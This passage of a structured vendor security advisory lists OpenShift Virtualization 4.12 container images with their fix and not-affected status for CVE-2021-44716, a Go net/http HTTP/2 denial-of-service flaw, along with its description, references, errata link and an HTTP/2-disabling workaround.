"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", }, { cve: "CVE-2021-44716", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030801", }, ], notes: [ { category: "description", text: "There's an uncontrolled resource consumption flaw in golang's net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http's http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: limit growth of header canonicalization cache", title: "Vulnerability summary", }, { category: "other", text: "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44716", }, { category: "external", summary: "RHBZ#2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44716", url: "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "workaround", details: "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", 